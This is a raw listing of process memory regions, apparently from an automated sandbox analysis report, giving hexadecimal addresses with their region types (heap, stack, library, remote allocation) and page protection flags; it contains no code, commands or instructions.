page read and write
21C38E4E000
heap
page read and write
740000
unkown
page execute and read and write
29E32785000
heap
page read and write
29E19E20000
trusted library allocation
page read and write
29440000
trusted library allocation
page read and write
41410000
trusted library allocation
page read and write
41D70000
trusted library allocation
page read and write
6EC40000
unkown
page readonly
296B0000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
2208000
direct allocation
page read and write
1A2C41B1000
heap
page read and write
1A2C4326000
heap
page read and write
2A000000
trusted library allocation
page read and write
314B1FE000
stack
page read and write
19AC19BE000
heap
page read and write
21C3382B000
heap
page read and write
5CE000
heap
page read and write
40B40000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
25B0D000
trusted library allocation
page execute and read and write
3D8F7000
heap
page read and write
2950D000
heap
page read and write
41440000
trusted library allocation
page read and write
1A2C41A1000
heap
page read and write
1A2C41B1000
heap
page read and write
1A2C438A000
heap
page read and write
41440000
trusted library allocation
page read and write
1A2C436A000
heap
page read and write
41450000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
296A0000
trusted library allocation
page read and write
7FFAAB85B000
trusted library allocation
page execute and read and write
21C38E1D000
heap
page read and write
29EB0000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
2443000
direct allocation
page read and write
21C346E0000
trusted library section
page readonly
25ABE000
stack
page read and write
2370000
heap
page read and write
13C5D000
direct allocation
page read and write
737000
heap
page read and write
1A2C41B1000
heap
page read and write
1A2C419C000
heap
page read and write
7FFAAB910000
trusted library allocation
page execute and read and write
1A2C41A2000
heap
page read and write
1A2C4711000
heap
page read and write
3BE5A000
heap
page read and write
29E19F76000
heap
page execute and read and write
1A2C41A2000
heap
page read and write
1A2C4393000
heap
page read and write
21C38E00000
heap
page read and write
1A2C438D000
heap
page read and write
41470000
trusted library allocation
page read and write
1A2C4398000
heap
page read and write
1A2C46F0000
heap
page read and write
411F3000
heap
page read and write
7FFAABB50000
trusted library allocation
page read and write
21C38D50000
trusted library allocation
page read and write
2B07BB97000
heap
page read and write
1A2C41B1000
heap
page read and write
3BD20000
heap
page read and write
1A2C41B1000
heap
page read and write
1A2C4368000
heap
page read and write
21C34C00000
trusted library allocation
page read and write
3D930000
heap
page read and write
1A2C41B1000
heap
page read and write
244A000
direct allocation
page read and write
2460000
direct allocation
page execute and read and write
40C20000
trusted library allocation
page read and write
13BDF000
direct allocation
page read and write
3DBE0000
trusted library allocation
page read and write
3BD99000
heap
page read and write
A7F000
stack
page read and write
2B000437000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
1A2C98B0000
heap
page readonly
1A2C419C000
heap
page read and write
1A2C4729000
heap
page read and write
1A2C41A1000
heap
page read and write
40B10000
trusted library allocation
page read and write
3D890000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
21C34291000
trusted library allocation
page read and write
28CD1000
heap
page read and write
29CAF000
stack
page read and write
1A2C41A0000
heap
page read and write
2944F000
heap
page read and write
25B24000
heap
page read and write
1A2C3790000
heap
page read and write
2444000
direct allocation
page read and write
41480000
trusted library allocation
page read and write
800000
remote allocation
page execute and read and write
21C34000000
heap
page read and write
41447000
trusted library allocation
page read and write
1A2C9972000
trusted library allocation
page read and write
C2F33FD000
stack
page read and write
1A2C4349000
heap
page read and write
5F0000
heap
page read and write
1A2C41B1000
heap
page read and write
1A2C4362000
heap
page read and write
296C0000
trusted library allocation
page read and write
19AC19B0000
heap
page read and write
29E2A0C6000
trusted library allocation
page read and write
1A2C4940000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
1F0000
heap
page read and write
7FFAABBB0000
trusted library allocation
page read and write
296F0000
trusted library allocation
page read and write
1A2C42F6000
heap
page read and write
7FDF0000
trusted library allocation
page execute and read and write
1A2C41B1000
heap
page read and write
2401C000
heap
page read and write
1A2C4749000
heap
page read and write
28F0C000
stack
page read and write
41D60000
trusted library allocation
page read and write
2B07C290000
heap
page read and write
640000
heap
page read and write
1A2C9870000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
1A2C3630000
trusted library allocation
page read and write
78E000
heap
page read and write
41440000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
29E323DC000
heap
page read and write
28D80000
trusted library allocation
page read and write
296C5000
trusted library allocation
page read and write
540000
unkown
page execute and read and write
1A2C41B1000
heap
page read and write
40A51000
heap
page read and write
41D70000
trusted library allocation
page read and write
7FC3F000
direct allocation
page read and write
7F140000
direct allocation
page read and write
4ED0000
heap
page read and write
2405B000
heap
page read and write
540000
remote allocation
page execute and read and write
1A2C41A6000
heap
page read and write
29E18299000
heap
page read and write
3BEA0000
trusted library section
page read and write
21C38EFC000
heap
page read and write
7FFAABA80000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
40A40000
trusted library allocation
page read and write
29720000
trusted library allocation
page read and write
C2F3537000
stack
page read and write
1A2C41B1000
heap
page read and write
41D60000
trusted library allocation
page read and write
291AF000
stack
page read and write
29690000
trusted library allocation
page read and write
3BE2F000
heap
page read and write
1A2C419A000
heap
page read and write
2B07C3C0000
heap
page read and write
41C20000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
46B0000
trusted library allocation
page read and write
1A2C41A3000
heap
page read and write
1A2C4331000
heap
page read and write
13C03000
direct allocation
page read and write
40BD0000
trusted library allocation
page read and write
21DD000
direct allocation
page read and write
41560000
trusted library allocation
page read and write
1A2C435E000
heap
page read and write
41440000
trusted library allocation
page read and write
3BE2B000
heap
page read and write
25D6F000
stack
page read and write
416000
unkown
page readonly
3D930000
heap
page read and write
7FFAAB970000
trusted library allocation
page execute and read and write
29CB0000
remote allocation
page read and write
1A2C419C000
heap
page read and write
3DD08000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
21C38E54000
heap
page read and write
1A2C4364000
heap
page read and write
296B0000
trusted library allocation
page read and write
2B07C260000
heap
page execute and read and write
41440000
trusted library allocation
page read and write
7FB5F000
direct allocation
page read and write
28D50000
trusted library allocation
page read and write
21C33800000
heap
page read and write
3D91E000
stack
page read and write
29E32794000
heap
page read and write
28E20000
trusted library allocation
page read and write
21C38CC0000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
297F0000
trusted library allocation
page read and write
1A2C41A2000
heap
page read and write
41440000
trusted library allocation
page read and write
D936C7E000
stack
page read and write
40AA0000
trusted library allocation
page read and write
1A2C4303000
heap
page read and write
40C20000
trusted library allocation
page read and write
1A2C4194000
heap
page read and write
2406B000
heap
page read and write
40AC0000
trusted library allocation
page read and write
7DE000
stack
page read and write
41445000
trusted library allocation
page read and write
1A2C430A000
heap
page read and write
1A2C4175000
heap
page read and write
1A2C41A1000
heap
page read and write
3FD38000
trusted library allocation
page read and write
1A2C41A2000
heap
page read and write
3BE4B000
heap
page read and write
29E3275E000
heap
page read and write
41DB0000
trusted library allocation
page read and write
29E1C315000
trusted library allocation
page read and write
6C0000
heap
page read and write
2A001000
trusted library allocation
page read and write
1A2C436A000
heap
page read and write
7FFAABB40000
trusted library allocation
page read and write
1444E000
stack
page read and write
1A2C41AB000
heap
page read and write
41570000
trusted library allocation
page read and write
4097E000
trusted library allocation
page read and write
2B07A2C0000
heap
page readonly
1A2C41BA000
heap
page read and write
1A2C434B000
heap
page read and write
3BE40000
heap
page read and write
40F2F000
stack
page read and write
402D2000
trusted library allocation
page read and write
1A2C41BA000
heap
page read and write
4121A000
heap
page read and write
1A2C41AB000
heap
page read and write
1A2C419A000
heap
page read and write
41560000
trusted library allocation
page read and write
21C33FC1000
trusted library allocation
page read and write
1A2C9979000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
29E18230000
heap
page read and write
7F1B0000
direct allocation
page read and write
344F000
stack
page read and write
3DDC0000
trusted library allocation
page read and write
7E0000
remote allocation
page execute and read and write
40BD0000
trusted library allocation
page read and write
28E40000
trusted library allocation
page read and write
41C30000
trusted library allocation
page read and write
2932E000
stack
page read and write
13EFE000
stack
page read and write
21C346C0000
trusted library section
page readonly
7FFAABC00000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
4098D000
trusted library allocation
page read and write
3BE50000
heap
page read and write
1A2C419A000
heap
page read and write
3DDB3000
trusted library allocation
page read and write
56E000
unkown
page read and write
29690000
trusted library allocation
page read and write
7FB70000
direct allocation
page read and write
1A2C42A0000
remote allocation
page read and write
41A30000
remote allocation
page read and write
41440000
trusted library allocation
page read and write
29E326E4000
heap
page read and write
1A2C419A000
heap
page read and write
1A2C41B1000
heap
page read and write
41480000
trusted library allocation
page read and write
41410000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
1A2C41A2000
heap
page read and write
28EA0000
trusted library allocation
page read and write
3BE90000
heap
page read and write
1A2C41B1000
heap
page read and write
28CA0000
trusted library allocation
page read and write
44B000
unkown
page execute and read and write
1A2C419A000
heap
page read and write
84D000
stack
page read and write
2967E000
stack
page read and write
41D80000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
40C30000
trusted library allocation
page read and write
40B50000
trusted library allocation
page read and write
7F0B0000
direct allocation
page read and write
71268FE000
stack
page read and write
3DDC6000
trusted library allocation
page read and write
41C40000
trusted library allocation
page read and write
AAE000
stack
page read and write
41440000
trusted library allocation
page read and write
29E19CA0000
trusted library allocation
page read and write
7EF10000
direct allocation
page read and write
28EB0000
trusted library allocation
page read and write
B70000
heap
page read and write
1A2C41AB000
heap
page read and write
21C38EEC000
heap
page read and write
41D60000
trusted library allocation
page read and write
40B70000
trusted library allocation
page read and write
19AC15F0000
heap
page read and write
13C5C000
stack
page read and write
412FD000
stack
page read and write
1A2C9979000
trusted library allocation
page read and write
1A2C34C2000
heap
page read and write
1A2C41A2000
heap
page read and write
5A0000
heap
page read and write
296F0000
trusted library allocation
page read and write
3BE33000
heap
page read and write
1A2C4710000
heap
page read and write
141BE000
stack
page read and write
29FF0000
trusted library allocation
page read and write
7FFAABAB0000
trusted library allocation
page read and write
7EA80000
direct allocation
page read and write
1A2C3638000
trusted library allocation
page read and write
41410000
trusted library allocation
page read and write
41C30000
trusted library allocation
page read and write
29E1C366000
trusted library allocation
page read and write
D9371BB000
stack
page read and write
41D70000
trusted library allocation
page read and write
19AC1727000
heap
page read and write
426000
unkown
page execute and read and write
40A70000
trusted library allocation
page read and write
41E70000
heap
page read and write
296C0000
trusted library allocation
page read and write
41D60000
trusted library allocation
page read and write
402C0000
trusted library allocation
page read and write
41430000
trusted library allocation
page read and write
40BA0000
trusted library allocation
page read and write
3D934000
heap
page read and write
29E1B081000
trusted library allocation
page read and write
7FFAABB60000
trusted library allocation
page read and write
296B0000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
4171E000
stack
page read and write
5B8000
heap
page read and write
1A2C41A2000
heap
page read and write
41440000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
29700000
trusted library allocation
page read and write
80B000
heap
page read and write
426000
unkown
page execute and read and write
2B07C16C000
heap
page read and write
1A2C4330000
heap
page read and write
1A2C41A2000
heap
page read and write
1A2C41A0000
heap
page read and write
1A2C41AF000
heap
page read and write
C2F373E000
stack
page read and write
27040000
trusted library allocation
page read and write
7E0000
unkown
page execute and read and write
2A000000
trusted library allocation
page read and write
7FFAABBC0000
trusted library allocation
page read and write
3BE10000
heap
page read and write
21C38CC4000
trusted library allocation
page read and write
314B17E000
unkown
page readonly
1A2C4377000
heap
page read and write
41D90000
trusted library allocation
page read and write
29FF0000
trusted library allocation
page read and write
411C0000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
41442000
trusted library allocation
page read and write
7EB10000
direct allocation
page read and write
1A2C419C000
heap
page read and write
29E1828F000
heap
page read and write
2851E000
trusted library allocation
page read and write
40B10000
trusted library allocation
page read and write
6EC41000
unkown
page execute read
1A2C41A2000
heap
page read and write
1A2C4349000
heap
page read and write
1A2C42F6000
heap
page read and write
1A2C4362000
heap
page read and write
740000
remote allocation
page execute and read and write
41560000
trusted library allocation
page read and write
1A2C46D5000
heap
page read and write
3DBF0000
heap
page read and write
28D10000
trusted library allocation
page read and write
24034000
heap
page read and write
40E2E000
stack
page read and write
1A2C41A1000
heap
page read and write
D936AFE000
stack
page read and write
1A2C438F000
heap
page read and write
3149EAC000
stack
page read and write
29FF0000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
40B50000
trusted library allocation
page read and write
3BE7E000
stack
page read and write
296B0000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
1A2C419A000
heap
page read and write
141BE000
stack
page read and write
41430000
trusted library allocation
page read and write
40C40000
trusted library allocation
page read and write
27F78000
trusted library allocation
page read and write
41C27000
trusted library allocation
page read and write
1A2C41A2000
heap
page read and write
29E1BA81000
trusted library allocation
page read and write
29E1BF5D000
trusted library allocation
page read and write
1A2C41AB000
heap
page read and write
28DC0000
trusted library allocation
page read and write
23F8000
direct allocation
page read and write
29FF0000
trusted library allocation
page read and write
1A2C4366000
heap
page read and write
3D824000
heap
page read and write
21C33929000
heap
page read and write
41570000
trusted library allocation
page read and write
1A2C4717000
heap
page read and write
29E1C1A9000
trusted library allocation
page read and write
29E19C90000
heap
page readonly
1A2C41AB000
heap
page read and write
2B07A125000
heap
page read and write
28EA0000
trusted library allocation
page read and write
41400000
trusted library allocation
page read and write
13C11000
direct allocation
page read and write
1A2C9941000
trusted library allocation
page read and write
710000
heap
page read and write
1A2C41AA000
heap
page read and write
712714E000
stack
page read and write
1A2C41A2000
heap
page read and write
41440000
trusted library allocation
page read and write
7F250000
direct allocation
page read and write
25B13000
trusted library allocation
page read and write
3DD99000
trusted library allocation
page read and write
3DB7E000
stack
page read and write
41560000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
29E1C059000
trusted library allocation
page read and write
2B07C398000
heap
page read and write
21C33840000
heap
page read and write
1A2C41B1000
heap
page read and write
21C39020000
remote allocation
page read and write
314A67E000
stack
page read and write
29E1C1CE000
trusted library allocation
page read and write
414D0000
trusted library allocation
page read and write
2B07A020000
heap
page read and write
29690000
trusted library allocation
page read and write
1A2C9979000
trusted library allocation
page read and write
1A2C41A1000
heap
page read and write
21C347E0000
trusted library allocation
page read and write
3BE32000
heap
page read and write
1A2C436A000
heap
page read and write
1A2C4352000
heap
page read and write
1A2C42FB000
heap
page read and write
1A2C41B1000
heap
page read and write
2B07A010000
heap
page read and write
29E326B8000
heap
page read and write
28536000
trusted library allocation
page read and write
19AC1757000
heap
page read and write
41570000
trusted library allocation
page read and write
3D8B7000
trusted library allocation
page execute and read and write
29E182D2000
heap
page read and write
1A2C419A000
heap
page read and write
296E0000
trusted library allocation
page read and write
25FC9000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
2135000
direct allocation
page read and write
41440000
trusted library allocation
page read and write
1A2C41A1000
heap
page read and write
1A2C4362000
heap
page read and write
7FFAABC30000
trusted library allocation
page read and write
24084000
heap
page read and write
1A2C419A000
heap
page read and write
1A2C41AA000
heap
page read and write
41440000
trusted library allocation
page read and write
25B42000
trusted library allocation
page read and write
1A2C4366000
heap
page read and write
29E1C0B9000
trusted library allocation
page read and write
7FBF0000
direct allocation
page read and write
1A2C3630000
trusted library allocation
page read and write
41439000
trusted library allocation
page read and write
7FFAAB852000
trusted library allocation
page read and write
3DDB0000
trusted library allocation
page read and write
1A2C41A3000
heap
page read and write
29E19F80000
heap
page execute and read and write
41480000
trusted library allocation
page read and write
13BE6000
direct allocation
page read and write
13C0A000
direct allocation
page read and write
414D0000
trusted library allocation
page read and write
29690000
trusted library allocation
page read and write
41450000
trusted library allocation
page read and write
3BDF4000
heap
page read and write
1A2C437A000
heap
page read and write
3DE64000
trusted library allocation
page read and write
41460000
trusted library allocation
page read and write
29750000
trusted library allocation
page read and write
28CB0000
trusted library allocation
page read and write
1A2C4362000
heap
page read and write
21C337E0000
trusted library section
page read and write
1A2C41A2000
heap
page read and write
400000
unkown
page readonly
1403E000
stack
page read and write
314B4FE000
stack
page read and write
41A7E000
stack
page read and write
3BE95000
heap
page read and write
41C30000
trusted library allocation
page read and write
21C38C81000
trusted library allocation
page read and write
41384000
heap
page read and write
1A2C9979000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
41460000
trusted library allocation
page read and write
294C3000
heap
page read and write
41447000
trusted library allocation
page read and write
21C38E61000
heap
page read and write
1A2C419A000
heap
page read and write
3D8C0000
heap
page read and write
3BE60000
heap
page read and write
1A2C48CE000
trusted library allocation
page read and write
7FFAABB30000
trusted library allocation
page read and write
19AC18E4000
heap
page read and write
41440000
trusted library allocation
page read and write
19AC1757000
heap
page read and write
7F0C0000
direct allocation
page read and write
41253000
heap
page read and write
3D8B2000
trusted library allocation
page read and write
41570000
trusted library allocation
page read and write
1A2C4188000
heap
page read and write
1A2C35A8000
trusted library allocation
page read and write
401000
unkown
page execute read
29E1FEEE000
trusted library allocation
page read and write
414B0000
trusted library allocation
page read and write
29E19C50000
heap
page read and write
40AE0000
trusted library allocation
page read and write
41D70000
trusted library allocation
page read and write
29FF0000
trusted library allocation
page read and write
C2F327D000
stack
page read and write
198000
stack
page read and write
2B07C370000
heap
page read and write
29E323AB000
heap
page read and write
1A2C419C000
heap
page read and write
7FFAAB834000
trusted library allocation
page read and write
19AC1664000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
1A2C9452000
trusted library allocation
page read and write
41430000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
40A51000
heap
page read and write
402DE000
trusted library allocation
page read and write
3D8AA000
trusted library allocation
page execute and read and write
7FFAABB50000
trusted library allocation
page read and write
4034F000
stack
page read and write
1A2C4198000
heap
page read and write
3FECE000
stack
page read and write
1A2C41B1000
heap
page read and write
308C000
heap
page read and write
40BB0000
trusted library allocation
page read and write
13C56000
direct allocation
page read and write
29E1C08C000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
7FFAABB40000
trusted library allocation
page read and write
24005000
heap
page read and write
1A2C4717000
heap
page read and write
1A2C419C000
heap
page read and write
29E1A040000
heap
page execute and read and write
3BE2E000
heap
page read and write
29CB0000
remote allocation
page read and write
40B60000
trusted library allocation
page read and write
41D60000
trusted library allocation
page read and write
400000
unkown
page readonly
2611000
direct allocation
page read and write
40C30000
trusted library allocation
page read and write
1A2C48E5000
trusted library allocation
page read and write
C2F32FE000
stack
page read and write
7DF492A60000
trusted library allocation
page execute and read and write
44B000
unkown
page execute and read and write
1A2C41A1000
heap
page read and write
1454F000
stack
page read and write
2B07C378000
heap
page read and write
28CC0000
trusted library allocation
page read and write
7FFAAB8EC000
trusted library allocation
page execute and read and write
1A2C419C000
heap
page read and write
1A2C41B1000
heap
page read and write
41D90000
trusted library allocation
page read and write
25C40000
heap
page read and write
1A2C439E000
heap
page read and write
40BC0000
trusted library allocation
page read and write
21C3388C000
heap
page read and write
1A2C419C000
heap
page read and write
1A2C41B1000
heap
page read and write
21C34002000
heap
page read and write
25B36000
trusted library allocation
page execute and read and write
28E90000
trusted library allocation
page read and write
29478000
heap
page read and write
3DE4B000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
800000
unkown
page execute and read and write
1A2C419A000
heap
page read and write
1A2C41BA000
heap
page read and write
296C0000
trusted library allocation
page read and write
1A2C438D000
heap
page read and write
19AC1688000
heap
page read and write
6EC40000
unkown
page readonly
1A2C41A4000
heap
page read and write
1A2C419C000
heap
page read and write
414A0000
trusted library allocation
page read and write
3450000
heap
page read and write
1A2C41A1000
heap
page read and write
296C0000
trusted library allocation
page read and write
314B8FE000
stack
page read and write
29FE0000
trusted library allocation
page read and write
41430000
trusted library allocation
page read and write
40F2F000
stack
page read and write
2B000001000
trusted library allocation
page read and write
7FFAABBC0000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
3D960000
heap
page read and write
7F11F000
direct allocation
page read and write
29FE0000
trusted library allocation
page read and write
2B010011000
trusted library allocation
page read and write
29E1A4D9000
trusted library allocation
page read and write
23FF000
direct allocation
page read and write
8A0000
unkown
page execute and read and write
21C38DD0000
trusted library allocation
page read and write
7FFAABAF0000
trusted library allocation
page read and write
41D90000
trusted library allocation
page read and write
3D900000
trusted library allocation
page execute and read and write
7FFAAB833000
trusted library allocation
page execute and read and write
1A2C437E000
heap
page read and write
29FE0000
trusted library allocation
page execute and read and write
21C38CD9000
trusted library allocation
page read and write
41D80000
trusted library allocation
page read and write
40960000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
1A2C418F000
heap
page read and write
2453000
direct allocation
page read and write
296E0000
trusted library allocation
page read and write
40A70000
trusted library allocation
page read and write
29690000
trusted library allocation
page read and write
29E323A4000
heap
page read and write
29E2AD4F000
trusted library allocation
page read and write
7FFAABB80000
trusted library allocation
page read and write
41410000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
296C0000
trusted library allocation
page read and write
19AC16A6000
heap
page read and write
3DC00000
trusted library allocation
page read and write
7FB10000
direct allocation
page read and write
1A2C41B1000
heap
page read and write
1A2C41AB000
heap
page read and write
9A000
stack
page read and write
29E1BF0F000
trusted library allocation
page read and write
13BC3000
direct allocation
page read and write
41D60000
trusted library allocation
page read and write
297E0000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
4143B000
trusted library allocation
page read and write
718000
heap
page read and write
41440000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
1A2C438D000
heap
page read and write
7EE50000
direct allocation
page read and write
28531000
trusted library allocation
page read and write
3BD7A000
heap
page read and write
5A0000
heap
page read and write
4143B000
trusted library allocation
page read and write
1A2C34BE000
heap
page read and write
418AE000
stack
page read and write
1A2C41B1000
heap
page read and write
1A2C41AB000
heap
page read and write
13EDF000
stack
page read and write
41D70000
heap
page read and write
1A2C41A2000
heap
page read and write
1A2C48F5000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
1A2C4377000
heap
page read and write
1A2C438D000
heap
page read and write
25C30000
trusted library allocation
page read and write
14976000
heap
page read and write
41440000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
23FFB000
heap
page read and write
1A2C41A2000
heap
page read and write
41410000
trusted library allocation
page read and write
1A2C9979000
trusted library allocation
page read and write
294DE000
heap
page read and write
21C338FF000
heap
page read and write
41478000
trusted library allocation
page read and write
41470000
trusted library allocation
page read and write
1A2C34A0000
heap
page read and write
770000
heap
page read and write
296C0000
trusted library allocation
page read and write
21C38DC0000
trusted library allocation
page read and write
7FB70000
direct allocation
page read and write
41470000
trusted library allocation
page read and write
28550000
trusted library allocation
page read and write
7FBF0000
direct allocation
page read and write
1454D000
stack
page read and write
296C0000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
28510000
trusted library allocation
page read and write
29C2F000
stack
page read and write
314B3FE000
stack
page read and write
1A2C419A000
heap
page read and write
3D8A0000
trusted library allocation
page read and write
3D8B0000
trusted library allocation
page read and write
1A2C4191000
heap
page read and write
C2F36BE000
stack
page read and write
28E50000
trusted library allocation
page read and write
41D90000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
14FEE000
heap
page read and write
3BE80000
trusted library section
page read and write
1A2C419A000
heap
page read and write
41460000
trusted library allocation
page read and write
1A2C9B20000
heap
page read and write
7FFAABA10000
trusted library allocation
page execute and read and write
296C0000
trusted library allocation
page read and write
2BF0000
heap
page read and write
41388000
heap
page read and write
1A2C432C000
heap
page read and write
1A2C419C000
heap
page read and write
1A2C41B1000
heap
page read and write
1A2C41B1000
heap
page read and write
29E1A205000
trusted library allocation
page read and write
5FA000
heap
page read and write
1A2C41A3000
heap
page read and write
7FFAAB9EA000
trusted library allocation
page read and write
41400000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
23F3000
heap
page read and write
41440000
trusted library allocation
page read and write
3D870000
trusted library allocation
page read and write
41D60000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
7F0C0000
direct allocation
page read and write
41460000
trusted library allocation
page read and write
21C38E8C000
heap
page read and write
25B70000
heap
page execute and read and write
81B000
heap
page read and write
21C33813000
heap
page read and write
1A2C41B1000
heap
page read and write
2EFD000
stack
page read and write
1A2C9920000
trusted library allocation
page read and write
41C30000
trusted library allocation
page read and write
3DA6F000
stack
page read and write
21C38C60000
trusted library allocation
page read and write
2A010000
trusted library allocation
page read and write
56E000
unkown
page read and write
737000
heap
page read and write
21FA000
direct allocation
page read and write
1A2C41B1000
heap
page read and write
1A2C41A1000
heap
page read and write
2942B000
stack
page read and write
414B0000
trusted library allocation
page read and write
41410000
trusted library allocation
page read and write
41300000
heap
page read and write
41431000
trusted library allocation
page read and write
1A2C3638000
trusted library allocation
page read and write
7FFAABBD0000
trusted library allocation
page read and write
29440000
trusted library allocation
page read and write
296E0000
trusted library allocation
page read and write
2B07A3EC000
heap
page read and write
2A030000
trusted library allocation
page read and write
2B90000
heap
page read and write
40A16000
trusted library allocation
page read and write
2340000
heap
page read and write
24019000
heap
page read and write
21C346F0000
trusted library section
page readonly
1A2C41B1000
heap
page read and write
29E2A060000
trusted library allocation
page read and write
97000
stack
page read and write
41D90000
trusted library allocation
page read and write
1440E000
stack
page read and write
2B0017D5000
trusted library allocation
page read and write
29EA7000
trusted library allocation
page read and write
29430000
trusted library allocation
page execute and read and write
41480000
trusted library allocation
page read and write
29E1A681000
trusted library allocation
page read and write
3DC10000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
29EB0000
trusted library allocation
page read and write
41441000
trusted library allocation
page read and write
1A2C48C5000
trusted library allocation
page read and write
2407A000
heap
page read and write
1A2C41B1000
heap
page read and write
1A2C9C04000
heap
page read and write
A5F000
stack
page read and write
2A000000
trusted library allocation
page read and write
1A2C98D0000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
2405C000
heap
page read and write
41490000
trusted library allocation
page read and write
3BD9D000
heap
page read and write
41D60000
trusted library allocation
page read and write
25B00000
trusted library allocation
page read and write
41570000
trusted library allocation
page read and write
28500000
trusted library allocation
page read and write
29EC0000
trusted library allocation
page read and write
2A020000
trusted library allocation
page read and write
21C337A0000
heap
page read and write
7FFAABAC0000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
41297000
heap
page read and write
1A2C9971000
trusted library allocation
page read and write
7EFE0000
direct allocation
page read and write
297E0000
trusted library allocation
page read and write
29440000
trusted library allocation
page read and write
41D70000
trusted library allocation
page read and write
291EE000
stack
page read and write
4106F000
stack
page read and write
29FE0000
trusted library allocation
page read and write
29B2E000
stack
page read and write
296B0000
trusted library allocation
page read and write
3BDB9000
heap
page read and write
1A2C4749000
heap
page read and write
25FF9000
trusted library allocation
page read and write
414D0000
trusted library allocation
page read and write
7FFAABAA0000
trusted library allocation
page read and write
1A2C4717000
heap
page read and write
240A0000
heap
page read and write
1A2C41A2000
heap
page read and write
41560000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
41283000
heap
page read and write
41490000
trusted library allocation
page read and write
670000
heap
page read and write
3BD20000
heap
page read and write
1A2C41A1000
heap
page read and write
1A2C41A2000
heap
page read and write
41470000
trusted library allocation
page read and write
2945A000
heap
page read and write
292EF000
stack
page read and write
297F0000
trusted library allocation
page read and write
296B0000
trusted library allocation
page read and write
41DB0000
trusted library allocation
page read and write
1A2C4391000
heap
page read and write
1A2C41A1000
heap
page read and write
41470000
trusted library allocation
page read and write
7126E4F000
stack
page read and write
3DBC0000
heap
page read and write
6EC56000
unkown
page readonly
41D70000
trusted library allocation
page read and write
3FEDE000
stack
page read and write
19AC1860000
trusted library allocation
page read and write
1F0000
heap
page read and write
40B50000
trusted library allocation
page read and write
29E1C941000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
28CF0000
trusted library allocation
page read and write
25FBF000
trusted library allocation
page read and write
1A2C42F1000
heap
page read and write
1A2C41B1000
heap
page read and write
1A2C41AB000
heap
page read and write
19AC1777000
heap
page read and write
41410000
trusted library allocation
page read and write
5B0000
heap
page read and write
3D8B5000
trusted library allocation
page execute and read and write
28CD0000
trusted library allocation
page read and write
296C1000
trusted library allocation
page read and write
750000
heap
page read and write
23FDD000
heap
page read and write
1A2C42A0000
heap
page read and write
731000
heap
page read and write
1A2C41B1000
heap
page read and write
7FD30000
direct allocation
page read and write
40B90000
trusted library allocation
page read and write
780000
heap
page read and write
41D60000
trusted library allocation
page read and write
401000
unkown
page execute read
41450000
trusted library allocation
page execute and read and write
28CE0000
trusted library allocation
page read and write
3BDAC000
heap
page read and write
1A2C4352000
heap
page read and write
1A2C4377000
heap
page read and write
2B07C1A0000
heap
page execute and read and write
40A50000
heap
page read and write
40D000
unkown
page write copy
803000
heap
page read and write
41430000
trusted library allocation
page read and write
1A2C41A2000
heap
page read and write
459000
unkown
page read and write
19AC1680000
heap
page read and write
1A2C9970000
trusted library allocation
page read and write
3BD70000
heap
page read and write
297E0000
trusted library allocation
page read and write
25B1D000
trusted library allocation
page execute and read and write
1A2C435E000
heap
page read and write
1A2C41B1000
heap
page read and write
41410000
trusted library allocation
page read and write
296B0000
trusted library allocation
page read and write
1A2C4140000
heap
page read and write
1A2C41B1000
heap
page read and write
21C38CB0000
trusted library allocation
page read and write
41460000
trusted library allocation
page read and write
7FFAABAF0000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
1A2C41A1000
heap
page read and write
41560000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
40C00000
trusted library allocation
page read and write
25ED000
direct allocation
page read and write
1A2C4175000
heap
page read and write
1A2C46D9000
heap
page read and write
29C7000
heap
page read and write
296C0000
trusted library allocation
page read and write
4025E000
stack
page read and write
13C73000
direct allocation
page read and write
1A2C41A2000
heap
page read and write
1A2C41A1000
heap
page read and write
1A2C439E000
heap
page read and write
29E1A55B000
trusted library allocation
page read and write
603000
heap
page read and write
7EBB0000
direct allocation
page read and write
1A2C41A2000
heap
